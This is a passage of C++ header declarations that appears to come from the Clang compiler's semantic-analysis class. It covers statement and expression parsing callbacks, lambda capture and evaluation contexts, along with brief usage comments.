ObjCMethodDecl *LookupImplementedMethodInGlobalPool(Selector Sel);
/// CollectIvarsToConstructOrDestruct - Collect those ivars which require
/// initialization.
void CollectIvarsToConstructOrDestruct(ObjCInterfaceDecl *OI,
SmallVectorImpl<ObjCIvarDecl*> &Ivars);
//===--------------------------------------------------------------------===//
// Statement Parsing Callbacks: SemaStmt.cpp.
public:
class FullExprArg {
public:
FullExprArg() : E(nullptr) { }
FullExprArg(Sema &actions) : E(nullptr) { }
ExprResult release() {
return E;
}
Expr *get() const { return E; }
Expr *operator->() {
return E;
}
private:
// FIXME: No need to make the entire Sema class a friend when it's just
// Sema::MakeFullExpr that needs access to the constructor below.
friend class Sema;
explicit FullExprArg(Expr *expr) : E(expr) {}
Expr *E;
};
FullExprArg MakeFullExpr(Expr *Arg) {
return MakeFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation());
}
FullExprArg MakeFullExpr(Expr *Arg, SourceLocation CC) {
return FullExprArg(
ActOnFinishFullExpr(Arg, CC, /*DiscardedValue*/ false).get());
}
FullExprArg MakeFullDiscardedValueExpr(Expr *Arg) {
ExprResult FE =
ActOnFinishFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation(),
/*DiscardedValue*/ true);
return FullExprArg(FE.get());
}
StmtResult ActOnExprStmt(ExprResult Arg, bool DiscardedValue = true);
StmtResult ActOnExprStmtError();
StmtResult ActOnNullStmt(SourceLocation SemiLoc,
bool HasLeadingEmptyMacro = false);
void ActOnStartOfCompoundStmt(bool IsStmtExpr);
void ActOnFinishOfCompoundStmt();
StmtResult ActOnCompoundStmt(SourceLocation L, SourceLocation R,
ArrayRef<Stmt *> Elts, bool isStmtExpr);
/// A RAII object to enter scope of a compound statement.
class CompoundScopeRAII {
public:
CompoundScopeRAII(Sema &S, bool IsStmtExpr = false) : S(S) {
S.ActOnStartOfCompoundStmt(IsStmtExpr);
}
~CompoundScopeRAII() {
S.ActOnFinishOfCompoundStmt();
}
private:
Sema &S;
};
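// Typical (assumed) usage: enter the scope for the duration of building the
// contents of a compound statement.
//
//   {
//     Sema::CompoundScopeRAII BodyScope(SemaRef);
//     // ... act on the statements of the body ...
//   } // ActOnFinishOfCompoundStmt() runs here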
/// An RAII helper that pops a function scope on exit.
struct FunctionScopeRAII {
Sema &S;
bool Active;
FunctionScopeRAII(Sema &S) : S(S), Active(true) {}
~FunctionScopeRAII() {
if (Active)
S.PopFunctionScopeInfo();
}
void disable() { Active = false; }
};
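// A sketch of the disable() escape hatch (assumed pattern): call it on paths
// where the function scope has already been popped by other means.
//
//   Sema::FunctionScopeRAII Guard(SemaRef);
//   // ... if ownership of the scope is transferred elsewhere:
//   Guard.disable(); // prevents a double PopFunctionScopeInfo()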
StmtResult ActOnDeclStmt(DeclGroupPtrTy Decl,
SourceLocation StartLoc,
SourceLocation EndLoc);
void ActOnForEachDeclStmt(DeclGroupPtrTy Decl);
StmtResult ActOnForEachLValueExpr(Expr *E);
ExprResult ActOnCaseExpr(SourceLocation CaseLoc, ExprResult Val);
StmtResult ActOnCaseStmt(SourceLocation CaseLoc, ExprResult LHS,
SourceLocation DotDotDotLoc, ExprResult RHS,
SourceLocation ColonLoc);
void ActOnCaseStmtBody(Stmt *CaseStmt, Stmt *SubStmt);
StmtResult ActOnDefaultStmt(SourceLocation DefaultLoc,
SourceLocation ColonLoc,
Stmt *SubStmt, Scope *CurScope);
StmtResult ActOnLabelStmt(SourceLocation IdentLoc, LabelDecl *TheDecl,
SourceLocation ColonLoc, Stmt *SubStmt);
StmtResult ActOnAttributedStmt(SourceLocation AttrLoc,
ArrayRef<const Attr*> Attrs,
Stmt *SubStmt);
class ConditionResult;
StmtResult ActOnIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult BuildIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult ActOnStartOfSwitchStmt(SourceLocation SwitchLoc,
Stmt *InitStmt,
ConditionResult Cond);
StmtResult ActOnFinishSwitchStmt(SourceLocation SwitchLoc,
Stmt *Switch, Stmt *Body);
StmtResult ActOnWhileStmt(SourceLocation WhileLoc, ConditionResult Cond,
Stmt *Body);
StmtResult ActOnDoStmt(SourceLocation DoLoc, Stmt *Body,
SourceLocation WhileLoc, SourceLocation CondLParen,
Expr *Cond, SourceLocation CondRParen);
StmtResult ActOnForStmt(SourceLocation ForLoc,
SourceLocation LParenLoc,
Stmt *First,
ConditionResult Second,
FullExprArg Third,
SourceLocation RParenLoc,
Stmt *Body);
ExprResult CheckObjCForCollectionOperand(SourceLocation forLoc,
Expr *collection);
StmtResult ActOnObjCForCollectionStmt(SourceLocation ForColLoc,
Stmt *First, Expr *collection,
SourceLocation RParenLoc);
StmtResult FinishObjCForCollectionStmt(Stmt *ForCollection, Stmt *Body);
enum BuildForRangeKind {
/// Initial building of a for-range statement.
BFRK_Build,
/// Instantiation or recovery rebuild of a for-range statement. Don't
/// attempt any typo-correction.
BFRK_Rebuild,
/// Determining whether a for-range statement could be built. Avoid any
/// unnecessary or irreversible actions.
BFRK_Check
};
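// For reference, the (simplified) desugaring these entry points build for a
// range-based for loop; this is the standard picture, not a verbatim quote:
//
//   for (auto X : Coll) use(X);
//   // becomes, roughly:
//   auto &&__range = Coll;
//   auto __begin = begin-expr, __end = end-expr;
//   for (; __begin != __end; ++__begin) { auto X = *__begin; use(X); }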
StmtResult ActOnCXXForRangeStmt(Scope *S, SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
Stmt *LoopVar,
SourceLocation ColonLoc, Expr *Collection,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult BuildCXXForRangeStmt(SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
SourceLocation ColonLoc,
Stmt *RangeDecl, Stmt *Begin, Stmt *End,
Expr *Cond, Expr *Inc,
Stmt *LoopVarDecl,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult FinishCXXForRangeStmt(Stmt *ForRange, Stmt *Body);
StmtResult ActOnGotoStmt(SourceLocation GotoLoc,
SourceLocation LabelLoc,
LabelDecl *TheDecl);
StmtResult ActOnIndirectGotoStmt(SourceLocation GotoLoc,
SourceLocation StarLoc,
Expr *DestExp);
StmtResult ActOnContinueStmt(SourceLocation ContinueLoc, Scope *CurScope);
StmtResult ActOnBreakStmt(SourceLocation BreakLoc, Scope *CurScope);
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind, unsigned NumParams);
typedef std::pair<StringRef, QualType> CapturedParamNameType;
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind,
ArrayRef<CapturedParamNameType> Params,
unsigned OpenMPCaptureLevel = 0);
StmtResult ActOnCapturedRegionEnd(Stmt *S);
void ActOnCapturedRegionError();
RecordDecl *CreateCapturedStmtRecordDecl(CapturedDecl *&CD,
SourceLocation Loc,
unsigned NumParams);
enum CopyElisionSemanticsKind {
CES_Strict = 0,
CES_AllowParameters = 1,
CES_AllowDifferentTypes = 2,
CES_AllowExceptionVariables = 4,
CES_FormerDefault = (CES_AllowParameters),
CES_Default = (CES_AllowParameters | CES_AllowDifferentTypes),
CES_AsIfByStdMove = (CES_AllowParameters | CES_AllowDifferentTypes |
CES_AllowExceptionVariables),
};
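// A hedged illustration of the classic NRVO candidate these flags gate:
//
//   Widget make() {
//     Widget W;   // 'W' is a copy-elision candidate
//     return W;   // may be constructed directly in the caller's return slot
//   }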
VarDecl *getCopyElisionCandidate(QualType ReturnType, Expr *E,
CopyElisionSemanticsKind CESK);
bool isCopyElisionCandidate(QualType ReturnType, const VarDecl *VD,
CopyElisionSemanticsKind CESK);
StmtResult ActOnReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp,
Scope *CurScope);
StmtResult BuildReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnCapScopeReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnGCCAsmStmt(SourceLocation AsmLoc, bool IsSimple,
bool IsVolatile, unsigned NumOutputs,
unsigned NumInputs, IdentifierInfo **Names,
MultiExprArg Constraints, MultiExprArg Exprs,
Expr *AsmString, MultiExprArg Clobbers,
unsigned NumLabels,
SourceLocation RParenLoc);
void FillInlineAsmIdentifierInfo(Expr *Res,
llvm::InlineAsmIdentifierInfo &Info);
ExprResult LookupInlineAsmIdentifier(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Id,
bool IsUnevaluatedContext);
bool LookupInlineAsmField(StringRef Base, StringRef Member,
unsigned &Offset, SourceLocation AsmLoc);
ExprResult LookupInlineAsmVarDeclField(Expr *RefExpr, StringRef Member,
SourceLocation AsmLoc);
StmtResult ActOnMSAsmStmt(SourceLocation AsmLoc, SourceLocation LBraceLoc,
ArrayRef<Token> AsmToks,
StringRef AsmString,
unsigned NumOutputs, unsigned NumInputs,
ArrayRef<StringRef> Constraints,
ArrayRef<StringRef> Clobbers,
ArrayRef<Expr*> Exprs,
SourceLocation EndLoc);
LabelDecl *GetOrCreateMSAsmLabel(StringRef ExternalLabelName,
SourceLocation Location,
bool AlwaysCreate);
VarDecl *BuildObjCExceptionDecl(TypeSourceInfo *TInfo, QualType ExceptionType,
SourceLocation StartLoc,
SourceLocation IdLoc, IdentifierInfo *Id,
bool Invalid = false);
Decl *ActOnObjCExceptionDecl(Scope *S, Declarator &D);
StmtResult ActOnObjCAtCatchStmt(SourceLocation AtLoc, SourceLocation RParen,
Decl *Parm, Stmt *Body);
StmtResult ActOnObjCAtFinallyStmt(SourceLocation AtLoc, Stmt *Body);
StmtResult ActOnObjCAtTryStmt(SourceLocation AtLoc, Stmt *Try,
MultiStmtArg Catch, Stmt *Finally);
StmtResult BuildObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw);
StmtResult ActOnObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw,
Scope *CurScope);
ExprResult ActOnObjCAtSynchronizedOperand(SourceLocation atLoc,
Expr *operand);
StmtResult ActOnObjCAtSynchronizedStmt(SourceLocation AtLoc,
Expr *SynchExpr,
Stmt *SynchBody);
StmtResult ActOnObjCAutoreleasePoolStmt(SourceLocation AtLoc, Stmt *Body);
VarDecl *BuildExceptionDeclaration(Scope *S, TypeSourceInfo *TInfo,
SourceLocation StartLoc,
SourceLocation IdLoc,
IdentifierInfo *Id);
Decl *ActOnExceptionDeclarator(Scope *S, Declarator &D);
StmtResult ActOnCXXCatchBlock(SourceLocation CatchLoc,
Decl *ExDecl, Stmt *HandlerBlock);
StmtResult ActOnCXXTryBlock(SourceLocation TryLoc, Stmt *TryBlock,
ArrayRef<Stmt *> Handlers);
StmtResult ActOnSEHTryBlock(bool IsCXXTry, // try (true) or __try (false) ?
SourceLocation TryLoc, Stmt *TryBlock,
Stmt *Handler);
StmtResult ActOnSEHExceptBlock(SourceLocation Loc,
Expr *FilterExpr,
Stmt *Block);
void ActOnStartSEHFinallyBlock();
void ActOnAbortSEHFinallyBlock();
StmtResult ActOnFinishSEHFinallyBlock(SourceLocation Loc, Stmt *Block);
StmtResult ActOnSEHLeaveStmt(SourceLocation Loc, Scope *CurScope);
void DiagnoseReturnInConstructorExceptionHandler(CXXTryStmt *TryBlock);
bool ShouldWarnIfUnusedFileScopedDecl(const DeclaratorDecl *D) const;
/// If it's a file scoped decl that must warn if not used, keep track
/// of it.
void MarkUnusedFileScopedDecl(const DeclaratorDecl *D);
/// DiagnoseUnusedExprResult - If the statement passed in is an expression
/// whose result is unused, warn.
void DiagnoseUnusedExprResult(const Stmt *S);
void DiagnoseUnusedNestedTypedefs(const RecordDecl *D);
void DiagnoseUnusedDecl(const NamedDecl *ND);
/// Emit \p DiagID if the statement located at \p StmtLoc has a suspicious
/// null statement as its \p Body, and that body is located on the same line.
///
/// This helps prevent bugs due to typos, such as:
/// if (condition);
/// do_stuff();
void DiagnoseEmptyStmtBody(SourceLocation StmtLoc,
const Stmt *Body,
unsigned DiagID);
/// Warn if a for/while loop statement \p S, which is followed by
/// \p PossibleBody, has a suspicious null statement as a body.
void DiagnoseEmptyLoopBody(const Stmt *S,
const Stmt *PossibleBody);
/// Warn if a value is moved to itself.
void DiagnoseSelfMove(const Expr *LHSExpr, const Expr *RHSExpr,
SourceLocation OpLoc);
/// Warn if we're implicitly casting from a _Nullable pointer type to a
/// _Nonnull one.
void diagnoseNullableToNonnullConversion(QualType DstType, QualType SrcType,
SourceLocation Loc);
/// Warn when implicitly casting 0 to nullptr.
void diagnoseZeroToNullptrConversion(CastKind Kind, const Expr *E);
ParsingDeclState PushParsingDeclaration(sema::DelayedDiagnosticPool &pool) {
return DelayedDiagnostics.push(pool);
}
void PopParsingDeclaration(ParsingDeclState state, Decl *decl);
typedef ProcessingContextState ParsingClassState;
ParsingClassState PushParsingClass() {
ParsingClassDepth++;
return DelayedDiagnostics.pushUndelayed();
}
void PopParsingClass(ParsingClassState state) {
ParsingClassDepth--;
DelayedDiagnostics.popUndelayed(state);
}
void redelayDiagnostics(sema::DelayedDiagnosticPool &pool);
void DiagnoseAvailabilityOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass,
bool ObjCPropertyAccess,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReceiver = nullptr);
bool makeUnavailableInSystemHeader(SourceLocation loc,
UnavailableAttr::ImplicitReason reason);
/// Issue any -Wunguarded-availability warnings in \c FD
void DiagnoseUnguardedAvailabilityViolations(Decl *FD);
void handleDelayedAvailabilityCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
//===--------------------------------------------------------------------===//
// Expression Parsing Callbacks: SemaExpr.cpp.
bool CanUseDecl(NamedDecl *D, bool TreatUnavailableAsInvalid);
bool DiagnoseUseOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass = nullptr,
bool ObjCPropertyAccess = false,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReceiver = nullptr);
void NoteDeletedFunction(FunctionDecl *FD);
void NoteDeletedInheritingConstructor(CXXConstructorDecl *CD);
bool DiagnosePropertyAccessorMismatch(ObjCPropertyDecl *PD,
ObjCMethodDecl *Getter,
SourceLocation Loc);
void DiagnoseSentinelCalls(NamedDecl *D, SourceLocation Loc,
ArrayRef<Expr *> Args);
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, Decl *LambdaContextDecl = nullptr,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
enum ReuseLambdaContextDecl_t { ReuseLambdaContextDecl };
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, ReuseLambdaContextDecl_t,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
void PopExpressionEvaluationContext();
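// A minimal sketch (assumed usage): analyze an expression in an unevaluated
// context, then restore the previous one.
//
//   S.PushExpressionEvaluationContext(
//       Sema::ExpressionEvaluationContext::Unevaluated);
//   // ... build or transform the expression ...
//   S.PopExpressionEvaluationContext();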
void DiscardCleanupsInEvaluationContext();
ExprResult TransformToPotentiallyEvaluated(Expr *E);
ExprResult HandleExprEvaluationContextForTypeof(Expr *E);
ExprResult CheckUnevaluatedOperand(Expr *E);
void CheckUnusedVolatileAssignment(Expr *E);
ExprResult ActOnConstantExpression(ExprResult Res);
// Functions for marking a declaration referenced. These functions also
// contain the relevant logic for marking if a reference to a function or
// variable is an odr-use (in the C++11 sense). There are separate variants
// for expressions referring to a decl; these exist because odr-use marking
// needs to be delayed for some constant variables when we build one of the
// named expressions.
//
// MightBeOdrUse indicates whether the use could possibly be an odr-use, and
// should usually be true. This only needs to be set to false if the lack of
// odr-use cannot be determined from the current context (for instance,
// because the name denotes a virtual function and was written without an
// explicit nested-name-specifier).
void MarkAnyDeclReferenced(SourceLocation Loc, Decl *D, bool MightBeOdrUse);
void MarkFunctionReferenced(SourceLocation Loc, FunctionDecl *Func,
bool MightBeOdrUse = true);
void MarkVariableReferenced(SourceLocation Loc, VarDecl *Var);
void MarkDeclRefReferenced(DeclRefExpr *E, const Expr *Base = nullptr);
void MarkMemberReferenced(MemberExpr *E);
void MarkFunctionParmPackReferenced(FunctionParmPackExpr *E);
void MarkCaptureUsedInEnclosingContext(VarDecl *Capture, SourceLocation Loc,
unsigned CapturingScopeIndex);
ExprResult CheckLValueToRValueConversionOperand(Expr *E);
void CleanupVarDeclMarking();
enum TryCaptureKind {
TryCapture_Implicit, TryCapture_ExplicitByVal, TryCapture_ExplicitByRef
};
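// Corresponding source forms, for orientation (standard C++ lambdas):
//
//   int N = 0;
//   auto A = [=]  { return N; };   // TryCapture_Implicit
//   auto B = [N]  { return N; };   // TryCapture_ExplicitByVal
//   auto C = [&N] { return ++N; }; // TryCapture_ExplicitByRef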
/// Try to capture the given variable.
///
/// \param Var The variable to capture.
///
/// \param Loc The location at which the capture occurs.
///
/// \param Kind The kind of capture, which may be implicit (for either a
/// block or a lambda), or explicit by-value or by-reference (for a lambda).
///
/// \param EllipsisLoc The location of the ellipsis, if one is provided in
/// an explicit lambda capture.
///
/// \param BuildAndDiagnose Whether we are actually supposed to add the
/// captures or diagnose errors. If false, this routine merely checks whether
/// the capture can occur, without performing the capture itself or complaining
/// if the variable cannot be captured.
///
/// \param CaptureType Will be set to the type of the field used to capture
/// this variable in the innermost block or lambda. Only valid when the
/// variable can be captured.
///
/// \param DeclRefType Will be set to the type of a reference to the capture
/// from within the current scope. Only valid when the variable can be
/// captured.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// variables that may or may not be used in certain specializations of
/// a nested generic lambda.
///
/// \returns true if an error occurred (i.e., the variable cannot be
/// captured) and false if the capture succeeded.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc, TryCaptureKind Kind,
SourceLocation EllipsisLoc, bool BuildAndDiagnose,
QualType &CaptureType,
QualType &DeclRefType,
const unsigned *const FunctionScopeIndexToStopAt);
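// A hedged sketch of the "check only" mode described above:
//
//   QualType CaptureTy, RefTy;
//   bool Invalid = S.tryCaptureVariable(
//       Var, Loc, Sema::TryCapture_Implicit, SourceLocation(),
//       /*BuildAndDiagnose=*/false, CaptureTy, RefTy,
//       /*FunctionScopeIndexToStopAt=*/nullptr);
//   // On success (!Invalid), CaptureTy/RefTy describe the would-be capture.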
/// Try to capture the given variable.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc,
TryCaptureKind Kind = TryCapture_Implicit,
SourceLocation EllipsisLoc = SourceLocation());
/// Checks if the variable must be captured.
bool NeedToCaptureVariable(VarDecl *Var, SourceLocation Loc);
/// Given a variable, determine the type that a reference to that
/// variable will have in the given scope.
QualType getCapturedDeclRefType(VarDecl *Var, SourceLocation Loc);
/// Mark all of the declarations referenced within a particular AST node as
/// referenced. Used when template instantiation instantiates a non-dependent
/// type -- entities referenced by the type are now referenced.
void MarkDeclarationsReferencedInType(SourceLocation Loc, QualType T);
void MarkDeclarationsReferencedInExpr(Expr *E,
bool SkipLocalVariables = false);
/// Try to recover by turning the given expression into a
/// call. Returns true if recovery was attempted or an error was
/// emitted; this may also leave the ExprResult invalid.
bool tryToRecoverWithCall(ExprResult &E, const PartialDiagnostic &PD,
bool ForceComplain = false,
bool (*IsPlausibleResult)(QualType) = nullptr);
/// Figure out if an expression could be turned into a call.
bool tryExprAsCall(Expr &E, QualType &ZeroArgCallReturnTy,
UnresolvedSetImpl &NonTemplateOverloads);
/// Conditionally issue a diagnostic based on the current
/// evaluation context.
///
/// \param Statement If Statement is non-null, delay reporting the
/// diagnostic until the function body is parsed, and then do a basic
/// reachability analysis to determine if the statement is reachable.
/// If it is unreachable, the diagnostic will not be emitted.
bool DiagRuntimeBehavior(SourceLocation Loc, const Stmt *Statement,
const PartialDiagnostic &PD);
/// Similar, but diagnostic is only produced if all the specified statements
/// are reachable.
bool DiagRuntimeBehavior(SourceLocation Loc, ArrayRef<const Stmt*> Stmts,
const PartialDiagnostic &PD);
// Primary Expressions.
SourceRange getExprRange(Expr *E) const;
ExprResult ActOnIdExpression(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
UnqualifiedId &Id, bool HasTrailingLParen, bool IsAddressOfOperand,
CorrectionCandidateCallback *CCC = nullptr,
bool IsInlineAsmIdentifier = false, Token *KeywordReplacement = nullptr);
void DecomposeUnqualifiedId(const UnqualifiedId &Id,
TemplateArgumentListInfo &Buffer,
DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *&TemplateArgs);
bool
DiagnoseEmptyLookup(Scope *S, CXXScopeSpec &SS, LookupResult &R,
CorrectionCandidateCallback &CCC,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
ArrayRef<Expr *> Args = None, TypoExpr **Out = nullptr);
DeclResult LookupIvarInObjCMethod(LookupResult &Lookup, Scope *S,
IdentifierInfo *II);
ExprResult BuildIvarRefExpr(Scope *S, SourceLocation Loc, ObjCIvarDecl *IV);
ExprResult LookupInObjCMethod(LookupResult &LookUp, Scope *S,
IdentifierInfo *II,
bool AllowBuiltinCreation=false);
ExprResult ActOnDependentIdExpression(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
bool isAddressOfOperand,
const TemplateArgumentListInfo *TemplateArgs);
/// If \p D cannot be odr-used in the current expression evaluation context,
/// return a reason explaining why. Otherwise, return NOUR_None.
NonOdrUseReason getNonOdrUseReasonInCurrentContext(ValueDecl *D);
DeclRefExpr *BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
SourceLocation Loc,
const CXXScopeSpec *SS = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
const CXXScopeSpec *SS = nullptr,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
NestedNameSpecifierLoc NNS,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
ExprResult
BuildAnonymousStructUnionMemberReference(
const CXXScopeSpec &SS,
SourceLocation nameLoc,
IndirectFieldDecl *indirectField,
DeclAccessPair FoundDecl = DeclAccessPair::make(nullptr, AS_none),
Expr *baseObjectExpr = nullptr,
SourceLocation opLoc = SourceLocation());
ExprResult BuildPossibleImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S);
ExprResult BuildImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
bool IsDefiniteInstance,
const Scope *S);
bool UseArgumentDependentLookup(const CXXScopeSpec &SS,
const LookupResult &R,
bool HasTrailingLParen);
ExprResult
BuildQualifiedDeclarationNameExpr(CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
bool IsAddressOfOperand, const Scope *S,
TypeSourceInfo **RecoveryTSI = nullptr);
ExprResult BuildDependentDeclRefExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildDeclarationNameExpr(const CXXScopeSpec &SS,
LookupResult &R,
bool NeedsADL,
bool AcceptInvalidDecl = false);
ExprResult BuildDeclarationNameExpr(
const CXXScopeSpec &SS, const DeclarationNameInfo &NameInfo, NamedDecl *D,
NamedDecl *FoundD = nullptr,
const TemplateArgumentListInfo *TemplateArgs = nullptr,
bool AcceptInvalidDecl = false);
ExprResult BuildLiteralOperatorCall(LookupResult &R,
DeclarationNameInfo &SuffixInfo,
ArrayRef<Expr *> Args,
SourceLocation LitEndLoc,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
ExprResult BuildPredefinedExpr(SourceLocation Loc,
PredefinedExpr::IdentKind IK);
ExprResult ActOnPredefinedExpr(SourceLocation Loc, tok::TokenKind Kind);
ExprResult ActOnIntegerConstant(SourceLocation Loc, uint64_t Val);
ExprResult BuildUniqueStableName(SourceLocation Loc, TypeSourceInfo *Operand);
ExprResult BuildUniqueStableName(SourceLocation Loc, Expr *E);
ExprResult ActOnUniqueStableNameExpr(SourceLocation OpLoc,
SourceLocation LParen,
SourceLocation RParen, ParsedType Ty);
ExprResult ActOnUniqueStableNameExpr(SourceLocation OpLoc,
SourceLocation LParen,
SourceLocation RParen, Expr *E);
bool CheckLoopHintExpr(Expr *E, SourceLocation Loc);
ExprResult ActOnNumericConstant(const Token &Tok, Scope *UDLScope = nullptr);
ExprResult ActOnCharacterConstant(const Token &Tok,
Scope *UDLScope = nullptr);
ExprResult ActOnParenExpr(SourceLocation L, SourceLocation R, Expr *E);
ExprResult ActOnParenListExpr(SourceLocation L,
SourceLocation R,
MultiExprArg Val);
/// ActOnStringLiteral - The specified tokens were lexed as pasted string
/// fragments (e.g. "foo" "bar" L"baz").
ExprResult ActOnStringLiteral(ArrayRef<Token> StringToks,
Scope *UDLScope = nullptr);
ExprResult ActOnGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<ParsedType> ArgTypes,
ArrayRef<Expr *> ArgExprs);
ExprResult CreateGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<TypeSourceInfo *> Types,
ArrayRef<Expr *> Exprs);
// Binary/Unary Operators. 'Tok' is the token for the operator.
ExprResult CreateBuiltinUnaryOp(SourceLocation OpLoc, UnaryOperatorKind Opc,
Expr *InputExpr);
ExprResult BuildUnaryOp(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opc, Expr *Input);
ExprResult ActOnUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Op, Expr *Input);
bool isQualifiedMemberAccess(Expr *E);
QualType CheckAddressOfOperand(ExprResult &Operand, SourceLocation OpLoc);
ExprResult CreateUnaryExprOrTypeTraitExpr(TypeSourceInfo *TInfo,
SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
SourceRange R);
ExprResult CreateUnaryExprOrTypeTraitExpr(Expr *E, SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind);
ExprResult
ActOnUnaryExprOrTypeTraitExpr(SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
bool IsType, void *TyOrEx,
SourceRange ArgRange);
ExprResult CheckPlaceholderExpr(Expr *E);
bool CheckVecStepExpr(Expr *E);
bool CheckUnaryExprOrTypeTraitOperand(Expr *E, UnaryExprOrTypeTrait ExprKind);
bool CheckUnaryExprOrTypeTraitOperand(QualType ExprType, SourceLocation OpLoc,
SourceRange ExprRange,
UnaryExprOrTypeTrait ExprKind);
ExprResult ActOnSizeofParameterPackExpr(Scope *S,
SourceLocation OpLoc,
IdentifierInfo &Name,
SourceLocation NameLoc,
SourceLocation RParenLoc);
ExprResult ActOnPostfixUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Kind, Expr *Input);
ExprResult ActOnArraySubscriptExpr(Scope *S, Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult CreateBuiltinArraySubscriptExpr(Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult ActOnOMPArraySectionExpr(Expr *Base, SourceLocation LBLoc,
Expr *LowerBound, SourceLocation ColonLoc,
Expr *Length, SourceLocation RBLoc);
ExprResult ActOnOMPArrayShapingExpr(Expr *Base, SourceLocation LParenLoc,
SourceLocation RParenLoc,
ArrayRef<Expr *> Dims,
ArrayRef<SourceRange> Brackets);
/// Data structure for iterator expression.
struct OMPIteratorData {
IdentifierInfo *DeclIdent = nullptr;
SourceLocation DeclIdentLoc;
ParsedType Type;
OMPIteratorExpr::IteratorRange Range;
SourceLocation AssignLoc;
SourceLocation ColonLoc;
SourceLocation SecColonLoc;
};
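// The concrete syntax this models, for orientation (an OpenMP 5.x iterator
// modifier; example only):
//
//   #pragma omp task depend(iterator(i = 0 : N), in : A[i])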
ExprResult ActOnOMPIteratorExpr(Scope *S, SourceLocation IteratorKwLoc,
SourceLocation LLoc, SourceLocation RLoc,
ArrayRef<OMPIteratorData> Data);
// This struct is for use by ActOnMemberAccess to allow
// BuildMemberReferenceExpr to reinvoke ActOnMemberAccess after
// changing the access operator from a '.' to a '->' (to see if that is the
// change needed to fix an error about an unknown member, e.g. when the class
// defines a custom operator->).
struct ActOnMemberAccessExtraArgs {
Scope *S;
UnqualifiedId &Id;
Decl *ObjCImpDecl;
};
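// An illustrative (assumed) scenario for the '.' -> '->' retry:
//
//   struct Handle { Widget *operator->(); };
//   Handle H;
//   H.draw(); // no member 'draw' in Handle; retried as H->draw()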
ExprResult BuildMemberReferenceExpr(
Expr *Base, QualType BaseType, SourceLocation OpLoc, bool IsArrow,
CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, const DeclarationNameInfo &NameInfo,
